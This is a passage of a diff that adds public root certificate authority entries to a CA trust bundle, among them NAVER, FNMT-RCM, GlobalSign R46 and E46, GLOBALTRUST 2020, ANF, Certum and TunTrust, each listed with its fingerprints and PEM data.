+CzAJBgNVBAYTAktSMSYwJAYDVQQKDB1OQVZFUiBCVVNJTkVTUyBQTEFURk9STSBD +b3JwLjEyMDAGA1UEAwwpTkFWRVIgR2xvYmFsIFJvb3QgQ2VydGlmaWNhdGlvbiBB +dXRob3JpdHkwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC21PGTXLVA +iQqrDZBbUGOukJR0F0Vy1ntlWilLp1agS7gvQnXp2XskWjFlqxcX0TM62RHcQDaH +38dq6SZeWYp34+hInDEW+j6RscrJo+KfziFTowI2MMtSAuXaMl3Dxeb57hHHi8lE +HoSTGEq0n+USZGnQJoViAbbJAh2+g1G7XNr4rRVqmfeSVPc0W+m/6imBEtRTkZaz +kVrd/pBzKPswRrXKCAfHcXLJZtM0l/aM9BhK4dA9WkW2aacp+yPOiNgSnABIqKYP +szuSjXEOdMWLyEz59JuOuDxp7W87UC9Y7cSw0BwbagzivESq2M0UXZR4Yb8Obtoq +vC8MC3GmsxY/nOb5zJ9TNeIDoKAYv7vxvvTWjIcNQvcGufFt7QSUqP620wbGQGHf +nZ3zVHbOUzoBppJB7ASjjw2i1QnK1sua8e9DXcCrpUHPXFNwcMmIpi3Ua2FzUCaG +YQ5fG8Ir4ozVu53BA0K6lNpfqbDKzE0K70dpAy8i+/Eozr9dUGWokG2zdLAIx6yo +0es+nPxdGoMuK8u180SdOqcXYZaicdNwlhVNt0xz7hlcxVs+Qf6sdWA7G2POAN3a +CJBitOUt7kinaxeZVL6HSuOpXgRM6xBtVNbv8ejyYhbLgGvtPe31HzClrkvJE+2K +AQHJuFFYwGY6sWZLxNUxAmLpdIQM201GLQIDAQABo0IwQDAdBgNVHQ4EFgQU0p+I +36HNLL3s9TsBAZMzJ7LrYEswDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMB +Af8wDQYJKoZIhvcNAQEMBQADggIBADLKgLOdPVQG3dLSLvCkASELZ0jKbY7gyKoN +qo0hV4/GPnrK21HUUrPUloSlWGB/5QuOH/XcChWB5Tu2tyIvCZwTFrFsDDUIbatj +cu3cvuzHV+YwIHHW1xDBE1UBjCpD5EHxzzp6U5LOogMFDTjfArsQLtk70pt6wKGm ++LUx5vR1yblTmXVHIloUFcd4G7ad6Qz4G3bxhYTeodoS76TiEJd6eN4MUZeoIUCL +hr0N8F5OSza7OyAfikJW4Qsav3vQIkMsRIz75Sq0bBwcupTgE34h5prCy8VCZLQe +lHsIJchxzIdFV4XTnyliIoNRlwAYl3dqmJLJfGBs32x9SuRwTMKeuB330DTHD8z7 +p/8Dvq1wkNoL3chtl1+afwkyQf3NosxabUzyqkn+Zvjp2DXrDige7kgvOtB5CTh8 +piKCk5XQA76+AqAF3SAi428diDRgxuYKuQl1C/AH6GmWNcf7I4GOODm4RStDeKLR +LBT/DShycpWbXgnbiUSYqqFJu3FS8r/2/yehNq+4tneI3TqkbZs0kNwUXTC/t+sX +5Ie3cdCh13cV1ELX8vMxmV2b3RZtP+oGI/hGoiLtk/bdmuYqh7GYVPEi92tF4+KO +dh2ajcQGjTa3FPOdVGm3jjzVpG2Tgbet9r1ke8LJaDmgkpzNNIaRkPpkUZ3+/uul +9XXeifdy +-----END CERTIFICATE----- + +# Issuer: CN=AC RAIZ FNMT-RCM SERVIDORES SEGUROS O=FNMT-RCM OU=Ceres +# Subject: CN=AC RAIZ FNMT-RCM SERVIDORES SEGUROS O=FNMT-RCM OU=Ceres +# Label: "AC RAIZ FNMT-RCM SERVIDORES SEGUROS" +# Serial: 131542671362353147877283741781055151509 +# MD5 Fingerprint: 19:36:9c:52:03:2f:d2:d1:bb:23:cc:dd:1e:12:55:bb +# SHA1 Fingerprint: 62:ff:d9:9e:c0:65:0d:03:ce:75:93:d2:ed:3f:2d:32:c9:e3:e5:4a +# SHA256 Fingerprint: 55:41:53:b1:3d:2c:f9:dd:b7:53:bf:be:1a:4e:0a:e0:8d:0a:a4:18:70:58:fe:60:a2:b8:62:b2:e4:b8:7b:cb +-----BEGIN CERTIFICATE----- +MIICbjCCAfOgAwIBAgIQYvYybOXE42hcG2LdnC6dlTAKBggqhkjOPQQDAzB4MQsw +CQYDVQQGEwJFUzERMA8GA1UECgwIRk5NVC1SQ00xDjAMBgNVBAsMBUNlcmVzMRgw +FgYDVQRhDA9WQVRFUy1RMjgyNjAwNEoxLDAqBgNVBAMMI0FDIFJBSVogRk5NVC1S +Q00gU0VSVklET1JFUyBTRUdVUk9TMB4XDTE4MTIyMDA5MzczM1oXDTQzMTIyMDA5 +MzczM1oweDELMAkGA1UEBhMCRVMxETAPBgNVBAoMCEZOTVQtUkNNMQ4wDAYDVQQL +DAVDZXJlczEYMBYGA1UEYQwPVkFURVMtUTI4MjYwMDRKMSwwKgYDVQQDDCNBQyBS +QUlaIEZOTVQtUkNNIFNFUlZJRE9SRVMgU0VHVVJPUzB2MBAGByqGSM49AgEGBSuB +BAAiA2IABPa6V1PIyqvfNkpSIeSX0oNnnvBlUdBeh8dHsVnyV0ebAAKTRBdp20LH 
+sbI6GA60XYyzZl2hNPk2LEnb80b8s0RpRBNm/dfF/a82Tc4DTQdxz69qBdKiQ1oK +Um8BA06Oi6NCMEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYD +VR0OBBYEFAG5L++/EYZg8k/QQW6rcx/n0m5JMAoGCCqGSM49BAMDA2kAMGYCMQCu +SuMrQMN0EfKVrRYj3k4MGuZdpSRea0R7/DjiT8ucRRcRTBQnJlU5dUoDzBOQn5IC +MQD6SmxgiHPz7riYYqnOK8LZiqZwMR2vsJRM60/G49HzYqc8/5MuB1xJAWdpEgJy +v+c= +-----END CERTIFICATE----- + +# Issuer: CN=GlobalSign Root R46 O=GlobalSign nv-sa +# Subject: CN=GlobalSign Root R46 O=GlobalSign nv-sa +# Label: "GlobalSign Root R46" +# Serial: 1552617688466950547958867513931858518042577 +# MD5 Fingerprint: c4:14:30:e4:fa:66:43:94:2a:6a:1b:24:5f:19:d0:ef +# SHA1 Fingerprint: 53:a2:b0:4b:ca:6b:d6:45:e6:39:8a:8e:c4:0d:d2:bf:77:c3:a2:90 +# SHA256 Fingerprint: 4f:a3:12:6d:8d:3a:11:d1:c4:85:5a:4f:80:7c:ba:d6:cf:91:9d:3a:5a:88:b0:3b:ea:2c:63:72:d9:3c:40:c9 +-----BEGIN CERTIFICATE----- +MIIFWjCCA0KgAwIBAgISEdK7udcjGJ5AXwqdLdDfJWfRMA0GCSqGSIb3DQEBDAUA +MEYxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMRwwGgYD +VQQDExNHbG9iYWxTaWduIFJvb3QgUjQ2MB4XDTE5MDMyMDAwMDAwMFoXDTQ2MDMy +MDAwMDAwMFowRjELMAkGA1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYt +c2ExHDAaBgNVBAMTE0dsb2JhbFNpZ24gUm9vdCBSNDYwggIiMA0GCSqGSIb3DQEB +AQUAA4ICDwAwggIKAoICAQCsrHQy6LNl5brtQyYdpokNRbopiLKkHWPd08EsCVeJ +OaFV6Wc0dwxu5FUdUiXSE2te4R2pt32JMl8Nnp8semNgQB+msLZ4j5lUlghYruQG +vGIFAha/r6gjA7aUD7xubMLL1aa7DOn2wQL7Id5m3RerdELv8HQvJfTqa1VbkNud +316HCkD7rRlr+/fKYIje2sGP1q7Vf9Q8g+7XFkyDRTNrJ9CG0Bwta/OrffGFqfUo +0q3v84RLHIf8E6M6cqJaESvWJ3En7YEtbWaBkoe0G1h6zD8K+kZPTXhc+CtI4wSE +y132tGqzZfxCnlEmIyDLPRT5ge1lFgBPGmSXZgjPjHvjK8Cd+RTyG/FWaha/LIWF +zXg4mutCagI0GIMXTpRW+LaCtfOW3T3zvn8gdz57GSNrLNRyc0NXfeD412lPFzYE ++cCQYDdF3uYM2HSNrpyibXRdQr4G9dlkbgIQrImwTDsHTUB+JMWKmIJ5jqSngiCN +I/onccnfxkF0oE32kRbcRoxfKWMxWXEM2G/CtjJ9++ZdU6Z+Ffy7dXxd7Pj2Fxzs +x2sZy/N78CsHpdlseVR2bJ0cpm4O6XkMqCNqo98bMDGfsVR7/mrLZqrcZdCinkqa +ByFrgY/bxFn63iLABJzjqls2k+g9vXqhnQt2sQvHnf3PmKgGwvgqo6GDoLclcqUC +4wIDAQABo0IwQDAOBgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNV +HQ4EFgQUA1yrc4GHqMywptWU4jaWSf8FmSwwDQYJKoZIhvcNAQEMBQADggIBAHx4 +7PYCLLtbfpIrXTncvtgdokIzTfnvpCo7RGkerNlFo048p9gkUbJUHJNOxO97k4Vg +JuoJSOD1u8fpaNK7ajFxzHmuEajwmf3lH7wvqMxX63bEIaZHU1VNaL8FpO7XJqti +2kM3S+LGteWygxk6x9PbTZ4IevPuzz5i+6zoYMzRx6Fcg0XERczzF2sUyQQCPtIk +pnnpHs6i58FZFZ8d4kuaPp92CC1r2LpXFNqD6v6MVenQTqnMdzGxRBF6XLE+0xRF +FRhiJBPSy03OXIPBNvIQtQ6IbbjhVp+J3pZmOUdkLG5NrmJ7v2B0GbhWrJKsFjLt +rWhV/pi60zTe9Mlhww6G9kuEYO4Ne7UyWHmRVSyBQ7N0H3qqJZ4d16GLuc1CLgSk +ZoNNiTW2bKg2SnkheCLQQrzRQDGQob4Ez8pn7fXwgNNgyYMqIgXQBztSvwyeqiv5 +u+YfjyW6hY0XHgL+XVAEV8/+LbzvXMAaq7afJMbfc2hIkCwU9D9SGuTSyxTDYWnP +4vkYxboznxSjBF25cfe1lNj2M8FawTSLfJvdkzrnE6JwYZ+vj+vYxXX4M2bUdGc6 +N3ec592kD3ZDZopD8p/7DEJ4Y9HiD2971KE9dJeFt0g5QdYg/NA6s/rob8SKunE3 +vouXsXgxT7PntgMTzlSdriVZzH81Xwj3QEUxeCp6 +-----END CERTIFICATE----- + +# Issuer: CN=GlobalSign Root E46 O=GlobalSign nv-sa +# Subject: CN=GlobalSign Root E46 O=GlobalSign nv-sa +# Label: "GlobalSign Root E46" +# Serial: 1552617690338932563915843282459653771421763 +# MD5 Fingerprint: b5:b8:66:ed:de:08:83:e3:c9:e2:01:34:06:ac:51:6f +# SHA1 Fingerprint: 39:b4:6c:d5:fe:80:06:eb:e2:2f:4a:bb:08:33:a0:af:db:b9:dd:84 +# SHA256 Fingerprint: cb:b9:c4:4d:84:b8:04:3e:10:50:ea:31:a6:9f:51:49:55:d7:bf:d2:e2:c6:b4:93:01:01:9a:d6:1d:9f:50:58 +-----BEGIN CERTIFICATE----- +MIICCzCCAZGgAwIBAgISEdK7ujNu1LzmJGjFDYQdmOhDMAoGCCqGSM49BAMDMEYx +CzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMRwwGgYDVQQD +ExNHbG9iYWxTaWduIFJvb3QgRTQ2MB4XDTE5MDMyMDAwMDAwMFoXDTQ2MDMyMDAw +MDAwMFowRjELMAkGA1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2Ex 
+HDAaBgNVBAMTE0dsb2JhbFNpZ24gUm9vdCBFNDYwdjAQBgcqhkjOPQIBBgUrgQQA +IgNiAAScDrHPt+ieUnd1NPqlRqetMhkytAepJ8qUuwzSChDH2omwlwxwEwkBjtjq +R+q+soArzfwoDdusvKSGN+1wCAB16pMLey5SnCNoIwZD7JIvU4Tb+0cUB+hflGdd +yXqBPCCjQjBAMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1Ud +DgQWBBQxCpCPtsad0kRLgLWi5h+xEk8blTAKBggqhkjOPQQDAwNoADBlAjEA31SQ +7Zvvi5QCkxeCmb6zniz2C5GMn0oUsfZkvLtoURMMA/cVi4RguYv/Uo7njLwcAjA8 ++RHUjE7AwWHCFUyqqx0LMV87HOIAl0Qx5v5zli/altP+CAezNIm8BZ/3Hobui3A= +-----END CERTIFICATE----- + +# Issuer: CN=GLOBALTRUST 2020 O=e-commerce monitoring GmbH +# Subject: CN=GLOBALTRUST 2020 O=e-commerce monitoring GmbH +# Label: "GLOBALTRUST 2020" +# Serial: 109160994242082918454945253 +# MD5 Fingerprint: 8a:c7:6f:cb:6d:e3:cc:a2:f1:7c:83:fa:0e:78:d7:e8 +# SHA1 Fingerprint: d0:67:c1:13:51:01:0c:aa:d0:c7:6a:65:37:31:16:26:4f:53:71:a2 +# SHA256 Fingerprint: 9a:29:6a:51:82:d1:d4:51:a2:e3:7f:43:9b:74:da:af:a2:67:52:33:29:f9:0f:9a:0d:20:07:c3:34:e2:3c:9a +-----BEGIN CERTIFICATE----- +MIIFgjCCA2qgAwIBAgILWku9WvtPilv6ZeUwDQYJKoZIhvcNAQELBQAwTTELMAkG +A1UEBhMCQVQxIzAhBgNVBAoTGmUtY29tbWVyY2UgbW9uaXRvcmluZyBHbWJIMRkw +FwYDVQQDExBHTE9CQUxUUlVTVCAyMDIwMB4XDTIwMDIxMDAwMDAwMFoXDTQwMDYx +MDAwMDAwMFowTTELMAkGA1UEBhMCQVQxIzAhBgNVBAoTGmUtY29tbWVyY2UgbW9u +aXRvcmluZyBHbWJIMRkwFwYDVQQDExBHTE9CQUxUUlVTVCAyMDIwMIICIjANBgkq +hkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAri5WrRsc7/aVj6B3GyvTY4+ETUWiD59b +RatZe1E0+eyLinjF3WuvvcTfk0Uev5E4C64OFudBc/jbu9G4UeDLgztzOG53ig9Z +YybNpyrOVPu44sB8R85gfD+yc/LAGbaKkoc1DZAoouQVBGM+uq/ufF7MpotQsjj3 +QWPKzv9pj2gOlTblzLmMCcpL3TGQlsjMH/1WljTbjhzqLL6FLmPdqqmV0/0plRPw +yJiT2S0WR5ARg6I6IqIoV6Lr/sCMKKCmfecqQjuCgGOlYx8ZzHyyZqjC0203b+J+ +BlHZRYQfEs4kUmSFC0iAToexIiIwquuuvuAC4EDosEKAA1GqtH6qRNdDYfOiaxaJ +SaSjpCuKAsR49GiKweR6NrFvG5Ybd0mN1MkGco/PU+PcF4UgStyYJ9ORJitHHmkH +r96i5OTUawuzXnzUJIBHKWk7buis/UDr2O1xcSvy6Fgd60GXIsUf1DnQJ4+H4xj0 +4KlGDfV0OoIu0G4skaMxXDtG6nsEEFZegB31pWXogvziB4xiRfUg3kZwhqG8k9Me +dKZssCz3AwyIDMvUclOGvGBG85hqwvG/Q/lwIHfKN0F5VVJjjVsSn8VoxIidrPIw +q7ejMZdnrY8XD2zHc+0klGvIg5rQmjdJBKuxFshsSUktq6HQjJLyQUp5ISXbY9e2 +nKd+Qmn7OmMCAwEAAaNjMGEwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMC +AQYwHQYDVR0OBBYEFNwuH9FhN3nkq9XVsxJxaD1qaJwiMB8GA1UdIwQYMBaAFNwu +H9FhN3nkq9XVsxJxaD1qaJwiMA0GCSqGSIb3DQEBCwUAA4ICAQCR8EICaEDuw2jA +VC/f7GLDw56KoDEoqoOOpFaWEhCGVrqXctJUMHytGdUdaG/7FELYjQ7ztdGl4wJC +XtzoRlgHNQIw4Lx0SsFDKv/bGtCwr2zD/cuz9X9tAy5ZVp0tLTWMstZDFyySCstd +6IwPS3BD0IL/qMy/pJTAvoe9iuOTe8aPmxadJ2W8esVCgmxcB9CpwYhgROmYhRZf ++I/KARDOJcP5YBugxZfD0yyIMaK9MOzQ0MAS8cE54+X1+NZK3TTN+2/BT+MAi1bi +kvcoskJ3ciNnxz8RFbLEAwW+uxF7Cr+obuf/WEPPm2eggAe2HcqtbepBEX4tdJP7 +wry+UUTF72glJ4DjyKDUEuzZpTcdN3y0kcra1LGWge9oXHYQSa9+pTeAsRxSvTOB +TI/53WXZFM2KJVj04sWDpQmQ1GwUY7VA3+vA/MRYfg0UFodUJ25W5HCEuGwyEn6C +MUO+1918oa2u1qsgEu8KwxCMSZY13At1XrFP1U80DhEgB3VDRemjEdqso5nCtnkn +4rnvyOL2NSl6dPrFf4IFYqYK6miyeUcGbvJXqBUzxvd4Sj1Ce2t+/vdG6tHrju+I +aFvowdlxfv1k7/9nR4hYJS8+hge9+6jlgqispdNpQ80xiEmEU5LAsTkbOYMBMMTy +qfrQA71yN2BWHzZ8vTmR9W0Nv3vXkg== +-----END CERTIFICATE----- + +# Issuer: CN=ANF Secure Server Root CA O=ANF Autoridad de Certificacion OU=ANF CA Raiz +# Subject: CN=ANF Secure Server Root CA O=ANF Autoridad de Certificacion OU=ANF CA Raiz +# Label: "ANF Secure Server Root CA" +# Serial: 996390341000653745 +# MD5 Fingerprint: 26:a6:44:5a:d9:af:4e:2f:b2:1d:b6:65:b0:4e:e8:96 +# SHA1 Fingerprint: 5b:6e:68:d0:cc:15:b6:a0:5f:1e:c1:5f:ae:02:fc:6b:2f:5d:6f:74 +# SHA256 Fingerprint: fb:8f:ec:75:91:69:b9:10:6b:1e:51:16:44:c6:18:c5:13:04:37:3f:6c:06:43:08:8d:8b:ef:fd:1b:99:75:99 +-----BEGIN CERTIFICATE----- 
+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 +-----END CERTIFICATE----- + +# Issuer: CN=Certum EC-384 CA O=Asseco Data Systems S.A. OU=Certum Certification Authority +# Subject: CN=Certum EC-384 CA O=Asseco Data Systems S.A. 
OU=Certum Certification Authority +# Label: "Certum EC-384 CA" +# Serial: 160250656287871593594747141429395092468 +# MD5 Fingerprint: b6:65:b3:96:60:97:12:a1:ec:4e:e1:3d:a3:c6:c9:f1 +# SHA1 Fingerprint: f3:3e:78:3c:ac:df:f4:a2:cc:ac:67:55:69:56:d7:e5:16:3c:e1:ed +# SHA256 Fingerprint: 6b:32:80:85:62:53:18:aa:50:d1:73:c9:8d:8b:da:09:d5:7e:27:41:3d:11:4c:f7:87:a0:f5:d0:6c:03:0c:f6 +-----BEGIN CERTIFICATE----- +MIICZTCCAeugAwIBAgIQeI8nXIESUiClBNAt3bpz9DAKBggqhkjOPQQDAzB0MQsw +CQYDVQQGEwJQTDEhMB8GA1UEChMYQXNzZWNvIERhdGEgU3lzdGVtcyBTLkEuMScw +JQYDVQQLEx5DZXJ0dW0gQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkxGTAXBgNVBAMT +EENlcnR1bSBFQy0zODQgQ0EwHhcNMTgwMzI2MDcyNDU0WhcNNDMwMzI2MDcyNDU0 +WjB0MQswCQYDVQQGEwJQTDEhMB8GA1UEChMYQXNzZWNvIERhdGEgU3lzdGVtcyBT +LkEuMScwJQYDVQQLEx5DZXJ0dW0gQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkxGTAX +BgNVBAMTEENlcnR1bSBFQy0zODQgQ0EwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAATE +KI6rGFtqvm5kN2PkzeyrOvfMobgOgknXhimfoZTy42B4mIF4Bk3y7JoOV2CDn7Tm +Fy8as10CW4kjPMIRBSqniBMY81CE1700LCeJVf/OTOffph8oxPBUw7l8t1Ot68Kj +QjBAMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFI0GZnQkdjrzife81r1HfS+8 +EF9LMA4GA1UdDwEB/wQEAwIBBjAKBggqhkjOPQQDAwNoADBlAjADVS2m5hjEfO/J +UG7BJw+ch69u1RsIGL2SKcHvlJF40jocVYli5RsJHrpka/F2tNQCMQC0QoSZ/6vn +nvuRlydd3LBbMHHOXjgaatkl5+r3YZJW+OraNsKHZZYuciUvf9/DE8k= +-----END CERTIFICATE----- + +# Issuer: CN=Certum Trusted Root CA O=Asseco Data Systems S.A. OU=Certum Certification Authority +# Subject: CN=Certum Trusted Root CA O=Asseco Data Systems S.A. OU=Certum Certification Authority +# Label: "Certum Trusted Root CA" +# Serial: 40870380103424195783807378461123655149 +# MD5 Fingerprint: 51:e1:c2:e7:fe:4c:84:af:59:0e:2f:f4:54:6f:ea:29 +# SHA1 Fingerprint: c8:83:44:c0:18:ae:9f:cc:f1:87:b7:8f:22:d1:c5:d7:45:84:ba:e5 +# SHA256 Fingerprint: fe:76:96:57:38:55:77:3e:37:a9:5e:7a:d4:d9:cc:96:c3:01:57:c1:5d:31:76:5b:a9:b1:57:04:e1:ae:78:fd +-----BEGIN CERTIFICATE----- +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 +-----END CERTIFICATE----- + +# Issuer: CN=TunTrust Root CA O=Agence Nationale de Certification Electronique +# Subject: CN=TunTrust Root CA O=Agence Nationale de Certification Electronique +# Label: "TunTrust Root CA" +# Serial: 108534058042236574382096126452369648152337120275 +# MD5 Fingerprint: 85:13:b9:90:5b:36:5c:b6:5e:b8:5a:f8:e0:31:57:b4 +# SHA1 Fingerprint: cf:e9:70:84:0f:e0:73:0f:9d:f6:0c:7f:2c:4b:ee:20:46:34:9c:bb +# SHA256 Fingerprint: 2e:44:10:2a:b5:8c:b8:54:19:45:1c:8e:19:d9:ac:f3:66:2c:af:bc:61:4b:6a:53:96:0a:30:f7:d0:e2:eb:41 +-----BEGIN CERTIFICATE----- +MIIFszCCA5ugAwIBAgIUEwLV4kBMkkaGFmddtLu7sms+/BMwDQYJKoZIhvcNAQEL +BQAwYTELMAkGA1UEBhMCVE4xNzA1BgNVBAoMLkFnZW5jZSBOYXRpb25hbGUgZGUg +Q2VydGlmaWNhdGlvbiBFbGVjdHJvbmlxdWUxGTAXBgNVBAMMEFR1blRydXN0IFJv +b3QgQ0EwHhcNMTkwNDI2MDg1NzU2WhcNNDQwNDI2MDg1NzU2WjBhMQswCQYDVQQG +EwJUTjE3MDUGA1UECgwuQWdlbmNlIE5hdGlvbmFsZSBkZSBDZXJ0aWZpY2F0aW9u +IEVsZWN0cm9uaXF1ZTEZMBcGA1UEAwwQVHVuVHJ1c3QgUm9vdCBDQTCCAiIwDQYJ +KoZIhvcNAQEBBQADggIPADCCAgoCggIBAMPN0/y9BFPdDCA61YguBUtB9YOCfvdZ 